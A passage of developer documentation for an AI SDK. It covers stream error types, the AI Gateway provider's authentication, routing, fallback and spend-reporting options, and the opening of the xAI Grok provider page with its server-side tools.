Receiving a reasoning-delta chunk without a preceding reasoning-start chunk
Receiving a reasoning-end chunk without a preceding reasoning-start chunk
Receiving a tool-input-delta chunk without a preceding tool-input-start chunk
Attempting to access a tool invocation that doesn't exist

Properties

chunkType: The type of chunk that caused the error (e.g., text-delta, reasoning-end, tool-input-delta)
chunkId: The ID associated with the failing chunk (part ID or toolCallId)
message: The error message with details about what went wrong

Checking for this Error

You can check if an error is an instance of AI_UIMessageStreamError using:

import { UIMessageStreamError } from 'ai';

if (UIMessageStreamError.isInstance(error)) {
  console.log('Chunk type:', error.chunkType);
  console.log('Chunk ID:', error.chunkId);
  // Handle the error
}

Common Solutions

Ensure proper chunk ordering: Always send a *-start chunk before any *-delta or *-end chunks for the same ID:

// Correct order
writer.write({ type: 'text-start', id: 'my-text' });
writer.write({ type: 'text-delta', id: 'my-text', delta: 'Hello' });
writer.write({ type: 'text-end', id: 'my-text' });

Verify IDs match: Ensure the id used in *-delta and *-end chunks matches the id used in the corresponding *-start chunk.

Handle error paths correctly: When writing error messages in custom transports, ensure you emit the full start/delta/end sequence:

// When handling errors in custom transports
writer.write({ type: 'text-start', id: errorId });
writer.write({
  type: 'text-delta',
  id: errorId,
  delta: 'Request failed...',
});
writer.write({ type: 'text-end', id: errorId });

Check stream producer logic: Review your streaming implementation to ensure chunks are sent in the correct order, especially when dealing with concurrent operations or merged streams.

title: AI_UnsupportedFunctionalityError description: Learn how to fix AI_UnsupportedFunctionalityError

AI_UnsupportedFunctionalityError

This error occurs when functionality is not supported.

Properties

functionality: The name of the unsupported functionality
message: The error message (optional, auto-generated from functionality)

Checking for this Error

You can check if an error is an instance of AI_UnsupportedFunctionalityError using:

import { UnsupportedFunctionalityError } from 'ai';

if (UnsupportedFunctionalityError.isInstance(error)) {
  // Handle the error
}

title: AI Gateway description: Learn how to use the AI Gateway provider with the AI SDK.

AI Gateway Provider

Features

Access models from multiple providers without having to install additional provider modules/dependencies
Use the same code structure across different AI providers
Switch between models and providers easily
Automatic authentication when deployed on Vercel
View pricing information across providers
Observability for AI model usage through the Vercel dashboard

Setup

The Vercel AI Gateway provider is part of the AI SDK.

Basic Usage

For most use cases, you can use the AI Gateway directly with a model string:

// use plain model string with global provider
import { generateText } from 'ai';

const { text } = await generateText({
  model: 'openai/gpt-5.4',
  prompt: 'Hello world',
});

// use provider instance (requires version 5.0.36 or later)
import { generateText, gateway } from 'ai';

const { text } = await generateText({
  model: gateway('openai/gpt-5.4'),
  prompt: 'Hello world',
});

The AI SDK automatically uses the AI Gateway when you pass a model string in the creator/model-name format.

Provider Instance

You can also import the default provider instance gateway from ai:

import { gateway } from 'ai';

You may want to create a custom provider instance when you need to:

Set custom configuration options (API key, base URL, headers)
Use the provider in a provider registry
Wrap the provider with middleware
Use different settings for different parts of your application

To create a custom provider instance, import createGateway from ai:

import { createGateway } from 'ai';

const gateway = createGateway({
  apiKey: process.env.AI_GATEWAY_API_KEY ?? '',
});

You can use the following optional settings to customize the AI Gateway provider instance:

baseURL string

Use a different URL prefix for API calls. The default prefix is https://ai-gateway.vercel.sh/v4/ai.
apiKey string

API key that is being sent using the Authorization header. It defaults to the AI_GATEWAY_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
metadataCacheRefreshMillis number

How frequently to refresh the metadata cache in milliseconds. Defaults to 5 minutes (300,000ms).

Authentication

The Gateway provider supports two authentication methods:

API Key Authentication

Set your API key via environment variable:

AI_GATEWAY_API_KEY=your_api_key_here

Or pass it directly to the provider:

import { createGateway } from 'ai';

const gateway = createGateway({
  apiKey: 'your_api_key_here',
});

OIDC Authentication (Vercel Deployments)

When deployed to Vercel, the AI Gateway provider supports authenticating using OIDC (OpenID Connect) tokens without API Keys.

How OIDC Authentication Works

In Production/Preview Deployments:
- OIDC authentication is automatically handled
- No manual configuration needed
- Tokens are automatically obtained and refreshed
In Local Development:
- First, install and authenticate with the Vercel CLI
- Run vercel env pull to download your project's OIDC token locally
- For automatic token management:
  - Use vercel dev to start your development server - this will handle token refreshing automatically
- For manual token management:
  - If not using vercel dev, note that OIDC tokens expire after 12 hours
  - You'll need to run vercel env pull again to refresh the token before it expires

Read more about using OIDC tokens in the Vercel AI Gateway docs.

Bring Your Own Key (BYOK)

You can connect your own provider credentials to use with Vercel AI Gateway. This lets you use your existing provider accounts and access private resources.

To set up BYOK, add your provider credentials in your Vercel team's AI Gateway settings. Once configured, AI Gateway automatically uses your credentials. No code changes are needed.

For providers like Azure where you can use custom deployment names, you can configure model mappings to map gateway model slugs to your deployment names. See model mappings for details.

Learn more in the BYOK documentation.

Language Models

You can create language models using a provider instance. The first argument is the model ID in the format creator/model-name:

import { generateText } from 'ai';

const { text } = await generateText({
  model: 'openai/gpt-5.4',
  prompt: 'Explain quantum computing in simple terms',
});

AI Gateway language models can also be used in the streamText function and support structured data generation with Output (see AI SDK Core).

Reranking Models

You can create reranking models using the rerankingModel method on the provider instance:

import { rerank } from 'ai';
import { gateway } from '@ai-sdk/gateway';

const { ranking } = await rerank({
  model: gateway.rerankingModel('cohere/rerank-v3.5'),
  query: 'What is the capital of France?',
  documents: [
    'Paris is the capital of France.',
    'Berlin is the capital of Germany.',
    'Madrid is the capital of Spain.',
  ],
  topN: 2,
});

console.log(ranking);
// [
//   { originalIndex: 0, score: 0.89, document: 'Paris is the capital of France.' },
//   { originalIndex: 2, score: 0.15, document: 'Madrid is the capital of Spain.' },
// ]

Reranking models are useful for improving search results in retrieval-augmented generation (RAG) pipelines by re-scoring candidate documents after an initial retrieval step.

Available Models

The AI Gateway supports models from OpenAI, Anthropic, Google, Meta, xAI, Mistral, DeepSeek, Amazon Bedrock, Cohere, Perplexity, Alibaba, and other providers.

For the complete list of available models, see the AI Gateway documentation.

Dynamic Model Discovery

You can discover available models programmatically:

import { gateway, generateText } from 'ai';

const availableModels = await gateway.getAvailableModels();

// List all available models
availableModels.models.forEach(model => {
  console.log(`${model.id}: ${model.name}`);
  if (model.description) {
    console.log(`  Description: ${model.description}`);
  }
  if (model.pricing) {
    console.log(`  Input: $${model.pricing.input}/token`);
    console.log(`  Output: $${model.pricing.output}/token`);
    if (model.pricing.cachedInputTokens) {
      console.log(
        `  Cached input (read): $${model.pricing.cachedInputTokens}/token`,
      );
    }
    if (model.pricing.cacheCreationInputTokens) {
      console.log(
        `  Cache creation (write): $${model.pricing.cacheCreationInputTokens}/token`,
      );
    }
  }
});

// Use any discovered model with plain string
const { text } = await generateText({
  model: availableModels.models[0].id, // e.g., 'openai/gpt-5.4'
  prompt: 'Hello world',
});

Credit Usage

You can check your team's current credit balance and usage:

import { gateway } from 'ai';

const credits = await gateway.getCredits();

console.log(`Team balance: ${credits.balance} credits`);
console.log(`Team total used: ${credits.total_used} credits`);

The getCredits() method returns your team's credit information based on the authenticated API key or OIDC token:

balance number - Your team's current available credit balance
total_used number - Total credits consumed by your team

Generation Lookup

import { gateway, generateText } from 'ai';

// Make a request
const result = await generateText({
  model: gateway('anthropic/claude-sonnet-4'),
  prompt: 'Explain quantum entanglement briefly',
});

// Get the generation ID from provider metadata
const generationId = result.providerMetadata?.gateway?.generationId;

// Look up detailed generation info
const generation = await gateway.getGenerationInfo({ id: generationId });

console.log(`Model: ${generation.model}`);
console.log(`Cost: $${generation.totalCost.toFixed(6)}`);
console.log(`Latency: ${generation.latency}ms`);
console.log(`Prompt tokens: ${generation.promptTokens}`);
console.log(`Completion tokens: ${generation.completionTokens}`);

With streamText, you can capture the generation ID from the first chunk via fullStream:

import { gateway, streamText } from 'ai';

const result = streamText({
  model: gateway('anthropic/claude-sonnet-4'),
  prompt: 'Explain quantum entanglement briefly',
});

let generationId: string | undefined;

for await (const part of result.fullStream) {
  if (!generationId && part.providerMetadata?.gateway?.generationId) {
    generationId = part.providerMetadata.gateway.generationId as string;
    console.log(`Generation ID (early): ${generationId}`);
  }
}

// Look up cost and usage after the stream completes
if (generationId) {
  const generation = await gateway.getGenerationInfo({ id: generationId });
  console.log(`Cost: $${generation.totalCost.toFixed(6)}`);
  console.log(`Finish reason: ${generation.finishReason}`);
}

The getGenerationInfo() method accepts:

id string - The generation ID to look up (format: gen_<ulid>, required)

It returns a GatewayGenerationInfo object with the following fields:

id string - The generation ID
totalCost number - Total cost in USD
upstreamInferenceCost number - Upstream inference cost in USD (relevant for BYOK)
usage number - Usage cost in USD (same as totalCost)
createdAt string - ISO 8601 timestamp when the generation was created
model string - Model identifier used
isByok boolean - Whether Bring Your Own Key credentials were used
providerName string - The provider that served this generation
streamed boolean - Whether streaming was used
finishReason string - Finish reason (e.g. 'stop')
latency number - Time to first token in milliseconds
generationTime number - Total generation time in milliseconds
promptTokens number - Number of prompt tokens
completionTokens number - Number of completion tokens
reasoningTokens number - Reasoning tokens used (if applicable)
cachedTokens number - Cached tokens used (if applicable)
cacheCreationTokens number - Cache creation input tokens
billableWebSearchCalls number - Number of billable web search calls

Examples

Basic Text Generation

import { generateText } from 'ai';

const { text } = await generateText({
  model: 'anthropic/claude-sonnet-4.6',
  prompt: 'Write a haiku about programming',
});

console.log(text);

Streaming

import { streamText } from 'ai';

const { textStream } = await streamText({
  model: 'openai/gpt-5.4',
  prompt: 'Explain the benefits of serverless architecture',
});

for await (const textPart of textStream) {
  process.stdout.write(textPart);
}

Tool Usage

import { generateText, tool } from 'ai';
import { z } from 'zod';

const { text } = await generateText({
  model: 'xai/grok-4',
  prompt: 'What is the weather like in San Francisco?',
  tools: {
    getWeather: tool({
      description: 'Get the current weather for a location',
      parameters: z.object({
        location: z.string().describe('The location to get weather for'),
      }),
      execute: async ({ location }) => {
        // Your weather API call here
        return `It's sunny in ${location}`;
      },
    }),
  },
});

Provider-Executed Tools

Some providers offer tools that are executed by the provider itself, such as OpenAI's web search tool. To use these tools through AI Gateway, import the provider to access the tool definitions:

import { generateText, isStepCount } from 'ai';
import { openai } from '@ai-sdk/openai';

const result = await generateText({
  model: 'openai/gpt-5.4-mini',
  prompt: 'What is the Vercel AI Gateway?',
  stopWhen: isStepCount(10),
  tools: {
    web_search: openai.tools.webSearch({}),
  },
});

console.dir(result.text);

Gateway Tools

The AI Gateway provider includes built-in tools that are executed by the gateway itself. These tools can be used with any model through the gateway.

Perplexity Search

import { gateway, generateText } from 'ai';

const result = await generateText({
  model: 'openai/gpt-5.4-nano',
  prompt: 'Search for news about AI regulations in January 2025.',
  tools: {
    perplexity_search: gateway.tools.perplexitySearch(),
  },
});

console.log(result.text);
console.log('Tool calls:', JSON.stringify(result.toolCalls, null, 2));
console.log('Tool results:', JSON.stringify(result.toolResults, null, 2));

You can also configure the search with optional parameters:

import { gateway, generateText } from 'ai';

const result = await generateText({
  model: 'openai/gpt-5.4-nano',
  prompt:
    'Search for news about AI regulations from the first week of January 2025.',
  tools: {
    perplexity_search: gateway.tools.perplexitySearch({
      maxResults: 5,
      searchLanguageFilter: ['en'],
      country: 'US',
      searchDomainFilter: ['reuters.com', 'bbc.com', 'nytimes.com'],
    }),
  },
});

console.log(result.text);
console.log('Tool calls:', JSON.stringify(result.toolCalls, null, 2));
console.log('Tool results:', JSON.stringify(result.toolResults, null, 2));

The Perplexity Search tool supports the following optional configuration options:

maxResults number

The maximum number of search results to return (1-20, default: 10).
maxTokensPerPage number

The maximum number of tokens to extract per search result page (256-2048, default: 2048).
maxTokens number

The maximum total tokens across all search results (default: 25000, max: 1000000).
searchLanguageFilter string[]

Filter search results by language using ISO 639-1 language codes (e.g., ['en'] for English, ['en', 'es'] for English and Spanish).
country string

Filter search results by country using ISO 3166-1 alpha-2 country codes (e.g., 'US' for United States, 'GB' for United Kingdom).
searchDomainFilter string[]

Limit search results to specific domains (e.g., ['reuters.com', 'bbc.com']). This is useful for restricting results to trusted sources.
searchRecencyFilter 'day' | 'week' | 'month' | 'year'

Filter search results by relative time period. Useful for always getting recent results (e.g., 'week' for results from the last week).

The tool works with both generateText and streamText:

import { gateway, streamText } from 'ai';

const result = streamText({
  model: 'openai/gpt-5.4-nano',
  prompt: 'Search for the latest news about AI regulations.',
  tools: {
    perplexity_search: gateway.tools.perplexitySearch(),
  },
});

for await (const part of result.fullStream) {
  switch (part.type) {
    case 'text-delta':
      process.stdout.write(part.text);
      break;
    case 'tool-call':
      console.log('\nTool call:', JSON.stringify(part, null, 2));
      break;
    case 'tool-result':
      console.log('\nTool result:', JSON.stringify(part, null, 2));
      break;
  }
}

Parallel Search

import { gateway, generateText } from 'ai';

const result = await generateText({
  model: 'openai/gpt-5.4-nano',
  prompt: 'Research the latest developments in quantum computing.',
  tools: {
    parallel_search: gateway.tools.parallelSearch(),
  },
});

console.log(result.text);
console.log('Tool calls:', JSON.stringify(result.toolCalls, null, 2));
console.log('Tool results:', JSON.stringify(result.toolResults, null, 2));

You can also configure the search with optional parameters:

import { gateway, generateText } from 'ai';

const result = await generateText({
  model: 'openai/gpt-5.4-nano',
  prompt: 'Find detailed information about TypeScript 5.0 features.',
  tools: {
    parallel_search: gateway.tools.parallelSearch({
      mode: 'agentic',
      maxResults: 5,
      sourcePolicy: {
        includeDomains: ['typescriptlang.org', 'github.com'],
      },
      excerpts: {
        maxCharsPerResult: 8000,
      },
    }),
  },
});

console.log(result.text);
console.log('Tool calls:', JSON.stringify(result.toolCalls, null, 2));
console.log('Tool results:', JSON.stringify(result.toolResults, null, 2));

The Parallel Search tool supports the following optional configuration options:

mode 'one-shot' | 'agentic'

Mode preset for different use cases:
- 'one-shot' - Comprehensive results with longer excerpts for single-response answers (default)
- 'agentic' - Concise, token-efficient results optimized for multi-step agentic workflows
maxResults number

Maximum number of results to return (1-20). Defaults to 10 if not specified.
sourcePolicy object

Source policy for controlling which domains to include/exclude:
- includeDomains - List of domains to include in search results
- excludeDomains - List of domains to exclude from search results
- afterDate - Only include results published after this date (ISO 8601 format)
excerpts object

Excerpt configuration for controlling result length:
- maxCharsPerResult - Maximum characters per result
- maxCharsTotal - Maximum total characters across all results
fetchPolicy object

Fetch policy for controlling content freshness:
- maxAgeSeconds - Maximum age in seconds for cached content (set to 0 for always fresh)

The tool works with both generateText and streamText:

import { gateway, streamText } from 'ai';

const result = streamText({
  model: 'openai/gpt-5.4-nano',
  prompt: 'Research the latest AI safety guidelines.',
  tools: {
    parallel_search: gateway.tools.parallelSearch(),
  },
});

for await (const part of result.fullStream) {
  switch (part.type) {
    case 'text-delta':
      process.stdout.write(part.text);
      break;
    case 'tool-call':
      console.log('\nTool call:', JSON.stringify(part, null, 2));
      break;
    case 'tool-result':
      console.log('\nTool result:', JSON.stringify(part, null, 2));
      break;
  }
}

Custom Reporting

Track usage per end-user and categorize requests with tags, then query the data through the reporting API.

Usage Tracking with User and Tags

import type { GatewayProviderOptions } from '@ai-sdk/gateway';
import { generateText } from 'ai';

const { text } = await generateText({
  model: 'openai/gpt-5.4',
  prompt: 'Summarize this document...',
  providerOptions: {
    gateway: {
      user: 'user-abc-123', // Track usage for this specific end-user
      tags: ['document-summary', 'premium-feature'], // Categorize for reporting
    } satisfies GatewayProviderOptions,
  },
});

This allows you to:

View usage and costs broken down by end-user in your analytics
Filter and analyze spending by feature or use case using tags
Track which users or features are driving the most AI usage

Querying Spend Reports

Use the getSpendReport() method to query usage data programmatically. The reporting API is only available for Vercel Pro and Enterprise plans. For pricing, see the Custom Reporting docs.

import { gateway } from 'ai';

const report = await gateway.getSpendReport({
  startDate: '2026-03-01',
  endDate: '2026-03-25',
  groupBy: 'model',
});

for (const row of report.results) {
  console.log(`${row.model}: $${row.totalCost.toFixed(4)}`);
}

The getSpendReport() method accepts the following parameters:

startDate string - Start date in YYYY-MM-DD format (inclusive, required)
endDate string - End date in YYYY-MM-DD format (inclusive, required)
groupBy string - Aggregation dimension: 'day' (default), 'user', 'model', 'tag', 'provider', or 'credential_type'
datePart string - Time granularity when groupBy is 'day': 'day' or 'hour'
userId string - Filter to a specific user
model string - Filter to a specific model (e.g. 'anthropic/claude-sonnet-4.5')
provider string - Filter to a specific provider (e.g. 'anthropic')
credentialType string - Filter by 'byok' or 'system' credentials
tags string[] - Filter to requests matching these tags

Each row in results contains a grouping field (matching your groupBy choice) and metrics:

totalCost number - Total cost in USD
marketCost number - Market cost in USD
inputTokens number - Number of input tokens
outputTokens number - Number of output tokens
cachedInputTokens number - Number of cached input tokens
cacheCreationInputTokens number - Number of cache creation input tokens
reasoningTokens number - Number of reasoning tokens
requestCount number - Number of requests

You can combine tracking and querying to analyze spend by tags you defined:

import type { GatewayProviderOptions } from '@ai-sdk/gateway';
import { gateway, streamText } from 'ai';

// 1. Make requests with tags
const result = streamText({
  model: gateway('anthropic/claude-haiku-4.5'),
  prompt: 'Summarize this quarter's results',
  providerOptions: {
    gateway: {
      tags: ['team:finance', 'feature:summaries'],
    } satisfies GatewayProviderOptions,
  },
});

// 2. Later, query spend filtered by those tags
const report = await gateway.getSpendReport({
  startDate: '2026-03-01',
  endDate: '2026-03-31',
  groupBy: 'tag',
  tags: ['team:finance'],
});

for (const row of report.results) {
  console.log(`${row.tag}: $${row.totalCost.toFixed(4)} (${row.requestCount} requests)`);
}

Provider Options

The AI Gateway provider accepts provider options that control routing behavior and provider-specific configurations.

Gateway Provider Options

You can use the gateway key in providerOptions to control how AI Gateway routes requests:

import type { GatewayProviderOptions } from '@ai-sdk/gateway';
import { generateText } from 'ai';

const { text } = await generateText({
  model: 'anthropic/claude-sonnet-4.6',
  prompt: 'Explain quantum computing',
  providerOptions: {
    gateway: {
      order: ['vertex', 'anthropic'], // Try Vertex AI first, then Anthropic
      only: ['vertex', 'anthropic'], // Only use these providers
    } satisfies GatewayProviderOptions,
  },
});

The following gateway provider options are available:

order string[]

Specifies the sequence of providers to attempt when routing requests. The gateway will try providers in the order specified. If a provider fails or is unavailable, it will move to the next provider in the list.

Example: order: ['bedrock', 'anthropic'] will attempt Amazon Bedrock first, then fall back to Anthropic.
only string[]

Restricts routing to only the specified providers. When set, the gateway will never route to providers not in this list, even if they would otherwise be available.

Example: only: ['anthropic', 'vertex'] will only allow routing to Anthropic or Vertex AI.
sort 'cost' | 'ttft' | 'tps'

Sorts available providers by a performance or cost metric before routing. The gateway will try the best-scoring provider first and fall back through the rest in sorted order. If unspecified, providers are ordered using the gateway's default system ranking.
- 'cost' — lowest cost first
- 'ttft' — lowest time-to-first-token first
- 'tps' — highest tokens-per-second first
When combined with order, the user-specified providers are promoted to the front while remaining providers follow the sorted order.

Example: sort: 'ttft' will route to the provider with the fastest time-to-first-token.

When sort is active, the response's providerMetadata.gateway.routing.sort object contains the sort option used, the resulting execution order, per-provider metric values, and any providers that were deprioritized.
models string[]

Specifies fallback models to use when the primary model fails or is unavailable. The gateway will try the primary model first (specified in the model parameter), then try each model in this array in order until one succeeds.

Example: models: ['openai/gpt-5.4-nano', 'gemini-3-flash-preview'] will try the fallback models in order if the primary model fails.
user string

Optional identifier for the end user on whose behalf the request is being made. This is used for spend tracking and attribution purposes, allowing you to track usage per end-user in your application.

Example: user: 'user-123' will associate this request with end-user ID "user-123" in usage reports.
tags string[]

Optional array of tags for categorizing and filtering usage in reports. Useful for tracking spend by feature, prompt version, or any other dimension relevant to your application.

Example: tags: ['chat', 'v2'] will tag this request with "chat" and "v2" for filtering in usage analytics.
byok Record<string, Array<Record<string, unknown>>>

Request-scoped BYOK (Bring Your Own Key) credentials to use for this request. When provided, any cached BYOK credentials configured in the gateway system are not considered. Requests may still fall back to use system credentials if the provided credentials fail.

Each provider can have multiple credentials (tried in order). The structure is a record where keys are provider slugs and values are arrays of credential objects.

Each credential can optionally include a modelMappings array to map AI Gateway model slugs to your deployment names (for example, custom Azure deployment names). If a BYOK request fails, the gateway falls back to system credentials using the default model name.

Examples:
- Single provider: byok: { 'anthropic': [{ apiKey: 'sk-ant-...' }] }
- Multiple credentials: byok: { 'vertex': [{ project: 'proj-1', googleCredentials: { privateKey: '...', clientEmail: '...' } }, { project: 'proj-2', googleCredentials: { privateKey: '...', clientEmail: '...' } }] }
- Multiple providers: byok: { 'anthropic': [{ apiKey: '...' }], 'bedrock': [{ accessKeyId: '...', secretAccessKey: '...' }] }
- With model mappings: byok: { 'azure': [{ apiKey: '...', resourceName: '...', modelMappings: [{ gatewayModelSlug: 'openai/gpt-5.4-nano', customModelId: 'my-deployment' }] }] }
zeroDataRetention boolean

Restricts routing to providers that have zero data retention agreements with Vercel for AI Gateway. When using BYOK credentials, this filter is not applied. If BYOK credentials fail and the request falls back to system credentials, only providers with zero data retention agreements will be used. If there are no providers available for the model with zero data retention, the request will fail. Request-level ZDR is only available for Vercel Pro and Enterprise plans.
disallowPromptTraining boolean

Restricts routing to providers that have agreements with Vercel for AI Gateway to not use prompts for model training. When using BYOK credentials, this filter is not applied. If BYOK credentials fail and the request falls back to system credentials, only providers that do not train on prompt data will be used. If there are no providers available for the model that disallow prompt training, the request will fail.
hipaaCompliant boolean

Restricts routing to models and tools from providers that have signed a BAA with Vercel for the use of AI Gateway (requires Vercel HIPAA BAA add on). BYOK credentials are skipped when hipaaCompliant is set to true to ensure that requests are only routed to providers that support HIPAA compliance.
quotaEntityId string

The unique identifier for the entity against which quota is tracked. Used for quota management and enforcement purposes.
providerTimeouts object

Per-provider timeouts for BYOK credentials in milliseconds. Controls how long to wait for a provider to start responding before falling back to the next available provider.

Example: providerTimeouts: { byok: { openai: 5000, anthropic: 2000 } }

For full details, see Provider Timeouts.

You can combine these options to have fine-grained control over routing and tracking:

import type { GatewayProviderOptions } from '@ai-sdk/gateway';
import { generateText } from 'ai';

const { text } = await generateText({
  model: 'anthropic/claude-sonnet-4.6',
  prompt: 'Write a haiku about programming',
  providerOptions: {
    gateway: {
      order: ['vertex'], // Prefer Vertex AI
      only: ['anthropic', 'vertex'], // Only allow these providers
    } satisfies GatewayProviderOptions,
  },
});

Model Fallbacks Example

The models option enables automatic fallback to alternative models when the primary model fails:

import type { GatewayProviderOptions } from '@ai-sdk/gateway';
import { generateText } from 'ai';

const { text } = await generateText({
  model: 'openai/gpt-5.4', // Primary model
  prompt: 'Write a TypeScript haiku',
  providerOptions: {
    gateway: {
      models: ['openai/gpt-5.4-nano', 'gemini-3-flash-preview'], // Fallback models
    } satisfies GatewayProviderOptions,
  },
});

// This will:
// 1. Try openai/gpt-5.4 first
// 2. If it fails, try openai/gpt-5.4-nano
// 3. If that fails, try gemini-3-flash-preview
// 4. Return the result from the first model that succeeds

Zero Data Retention Example

Set zeroDataRetention to true to route requests to providers that have zero data retention agreements with Vercel for AI Gateway. When using BYOK credentials, this filter is not applied. If BYOK credentials fail and the request falls back to system credentials, only providers with zero data retention agreements will be used. If there are no providers available for the model with zero data retention, the request will fail. When zeroDataRetention is false or not specified, there is no enforcement of restricting routing. Request-level ZDR is only available for Vercel Pro and Enterprise plans.

import type { GatewayProviderOptions } from '@ai-sdk/gateway';
import { generateText } from 'ai';

const { text } = await generateText({
  model: 'anthropic/claude-sonnet-4.6',
  prompt: 'Analyze this sensitive document...',
  providerOptions: {
    gateway: {
      zeroDataRetention: true,
    } satisfies GatewayProviderOptions,
  },
});

Disallow Prompt Training Example

Set disallowPromptTraining to true to route requests to providers that have agreements with Vercel for AI Gateway to not use prompts for model training. When using BYOK credentials, this filter is not applied. If BYOK credentials fail and the request falls back to system credentials, only providers that do not train on prompt data will be used. If there are no providers available for the model that disallow prompt training, the request will fail. When disallowPromptTraining is false or not specified, there is no enforcement of restricting routing.

import type { GatewayProviderOptions } from '@ai-sdk/gateway';
import { generateText } from 'ai';

const { text } = await generateText({
  model: 'anthropic/claude-sonnet-4.6',
  prompt: 'Analyze this proprietary business data...',
  providerOptions: {
    gateway: {
      disallowPromptTraining: true,
    } satisfies GatewayProviderOptions,
  },
});

HIPAA Compliance Example

import type { GatewayProviderOptions } from '@ai-sdk/gateway';
import { generateText } from 'ai';

const { text } = await generateText({
  model: 'anthropic/claude-sonnet-4.6',
  prompt: 'Analyze this patient data...',
  providerOptions: {
    gateway: {
      hipaaCompliant: true,
    } satisfies GatewayProviderOptions,
  },
});

Quota Entity ID Example

import type { GatewayProviderOptions } from '@ai-sdk/gateway';
import { generateText } from 'ai';

const { text } = await generateText({
  model: 'anthropic/claude-sonnet-4.6',
  prompt: 'Summarize this report...',
  providerOptions: {
    gateway: {
      quotaEntityId: 'org-123',
    } satisfies GatewayProviderOptions,
  },
});

Provider-Specific Options

When using provider-specific options through AI Gateway, use the actual provider name (e.g. anthropic, openai, not gateway) as the key:

import type { AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import type { GatewayProviderOptions } from '@ai-sdk/gateway';
import { generateText } from 'ai';

const { text } = await generateText({
  model: 'anthropic/claude-sonnet-4.6',
  prompt: 'Explain quantum computing',
  providerOptions: {
    gateway: {
      order: ['vertex', 'anthropic'],
    } satisfies GatewayProviderOptions,
    anthropic: {
      thinking: { type: 'enabled', budgetTokens: 12000 },
    } satisfies AnthropicLanguageModelOptions,
  },
});

This works with any provider supported by AI Gateway. Each provider has its own set of options - see the individual provider documentation pages for details on provider-specific options.

Available Providers

AI Gateway supports routing to 20+ providers.

For a complete list of available providers and their slugs, see the AI Gateway documentation.

Model Capabilities

Model capabilities depend on the specific provider and model you're using. For detailed capability information, see:

AI Gateway provider options for an overview of available providers
Individual AI SDK provider pages for specific model capabilities and features

title: xAI Grok description: Learn how to use xAI Grok and Imagine.

xAI Grok Provider

The xAI Grok provider contains language model support for the xAI API.

Setup

The xAI Grok provider is available via the @ai-sdk/xai module. You can install it with

Provider Instance

You can import the default provider instance xai from @ai-sdk/xai:

import { xai } from '@ai-sdk/xai';

If you need a customized setup, you can import createXai from @ai-sdk/xai and create a provider instance with your settings:

import { createXai } from '@ai-sdk/xai';

const xai = createXai({
  apiKey: 'your-api-key',
});

You can use the following optional settings to customize the xAI provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.x.ai/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the XAI_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create xAI models using a provider instance. The first argument is the model id, e.g. grok-4.20-non-reasoning.

const model = xai('grok-4.20-non-reasoning');

By default, xai(modelId) uses the Responses API. To use the Chat Completions API (legacy), use xai.chat(modelId).

Example

You can use xAI language models to generate text with the generateText function:

import { xai } from '@ai-sdk/xai';
import { generateText } from 'ai';

const { text } = await generateText({
  model: xai('grok-4.20-non-reasoning'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

xAI language models can also be used in the streamText function and support structured data generation with Output (see AI SDK Core).

Responses API (Agentic Tools)

The xAI Responses API is the default when using xai(modelId). You can also use xai.responses(modelId) explicitly. This enables the model to autonomously orchestrate tool calls and research on xAI's servers.

const model = xai.responses('grok-4.20-non-reasoning');

The Responses API provides server-side tools that the model can autonomously execute during its reasoning process:

web_search: Real-time web search and page browsing
x_search: Search X (Twitter) posts, users, and threads
code_execution: Execute Python code for calculations and data analysis
view_image: View and analyze images
view_x_video: View and analyze videos from X posts
mcp_server: Connect to remote MCP servers and use their tools
file_search: Search through documents in vector stores (collections)

Vision

The Responses API supports image input with vision models:

import { xai } from '@ai-sdk/xai';
import { generateText } from 'ai';

const { text } = await generateText({
  model: xai.responses('grok-3'),
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'What do you see in this image?' },
        { type: 'image', image: fs.readFileSync('./image.png') },
      ],
    },
  ],
});

Web Search Tool

The web search tool enables autonomous web research with optional domain filtering and image understanding:

import { xai } from '@ai-sdk/xai';
import { generateText } from 'ai';

const { text, sources } = await generateText({
  model: xai.responses('grok-4.20-non-reasoning'),
  prompt: 'What are the latest developments in AI?',
  tools: {
    web_search: xai.tools.webSearch({
      allowedDomains: ['arxiv.org', 'openai.com'],
      enableImageUnderstanding: true,
    }),
  },
});

console.log(text);
console.log('Citations:', sources);

Web Search Parameters

allowedDomains string[]

Only search within specified domains (max 5). Cannot be used with excludedDomains.
excludedDomains string[]

Exclude specified domains from search (max 5). Cannot be used with allowedDomains.
enableImageUnderstanding boolean

Enable the model to view and analyze images found during search. Increases token usage.

X Search Tool

The X search tool enables searching X (Twitter) for posts, with filtering by handles and date ranges:

const { text, sources } = await generateText({
  model: xai.responses('grok-4.20-non-reasoning'),
  prompt: 'What are people saying about AI on X this week?',
  tools: {
    x_search: xai.tools.xSearch({
      allowedXHandles: ['elonmusk', 'xai'],
      fromDate: '2025-10-23',
      toDate: '2025-10-30',
      enableImageUnderstanding: true,
      enableVideoUnderstanding: true,
    }),
  },
});

X Search Parameters

allowedXHandles string[]

Only search posts from specified X handles (max 10). Cannot be used with excludedXHandles.
excludedXHandles string[]

Exclude posts from specified X handles (max 10). Cannot be used with allowedXHandles.
fromDate string

Start date for posts in ISO8601 format (YYYY-MM-DD).
toDate string

End date for posts in ISO8601 format (YYYY-MM-DD).
enableImageUnderstanding boolean

Enable the model to view and analyze images in X posts.
enableVideoUnderstanding boolean

Enable the model to view and analyze videos in X posts.

Code Execution Tool

The code execution tool enables the model to write and execute Python code for calculations and data analysis:

const { text } = await generateText({
  model: xai.responses('grok-4.20-non-reasoning'),
  prompt:
    'Calculate the compound interest for $10,000 at 5% annually for 10 years',
  tools: {
    code_execution: xai.tools.codeExecution(),
  },
});

View Image Tool

The view image tool enables the model to view and analyze images:

const { text } = await generateText({
  model: xai.responses('grok-4.20-non-reasoning'),
  prompt: 'Describe what you see in the image',
  tools: {
    view_image: xai.tools.viewImage(),
  },
});

